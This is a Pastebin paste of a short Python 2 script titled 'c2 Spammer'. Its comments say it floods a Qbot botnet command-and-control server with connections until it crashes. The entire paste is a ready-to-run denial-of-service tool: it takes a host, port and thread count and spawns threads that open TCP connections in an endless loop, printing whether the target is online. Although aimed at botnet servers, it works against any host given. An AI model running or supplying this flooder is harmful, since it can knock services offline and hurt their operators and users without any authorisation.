Advertisement
ogslippers

c2 Spammer [PY]

Sep 15th, 2019
311
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.06 KB | None | 0 0
  1. # Revamped By Slippers
  2. # Script Spams Qbot Cnc With Users Causing To Crash
  3. # Creds To Lno !
  4.  
  5. import socket
  6. import os
  7. import sys
  8. import threading
  9. import time
  10.  
  11. if len(sys.argv) < 4:
  12. sys.exit("Usage: python "+sys.argv[0]+" Host Port Threads( 1-25 )")
  13.  
  14. ip = str(sys.argv[1])
  15. port = int(sys.argv[2])
  16. wthreads = int(sys.argv[3])
  17.  
  18. def worker():
  19. try:
  20. while True:
  21. try:
  22. gang = crashc2(ip)
  23. gang.start()
  24. time.sleep(0.001)
  25. except:
  26. pass
  27. except:
  28. pass
  29.  
  30. class crashc2(threading.Thread):
  31. def __init__ (self, ip):
  32. threading.Thread.__init__(self)
  33. self.ip = ip
  34. def run(self):
  35. try:
  36. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  37. sock.connect((self.ip,port))
  38. print "\033[37m[\033[32m+] \033[37mc2 Statis \033[32mActive \033[37m[\033[32m+\033[37m]"
  39. time.sleep(5)
  40. except:
  41. print "\033[37m[\033[32m+] \033[37mc2 Statis \033[32mOffline \033[37m[\033[32m+\033[37m]"
  42. pass
  43.  
  44. for g in xrange(wthreads):
  45. try:
  46. gang2 = threading.Thread(target=worker)
  47. gang2.start()
  48. time.sleep(0.5)
  49. except:
  50. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement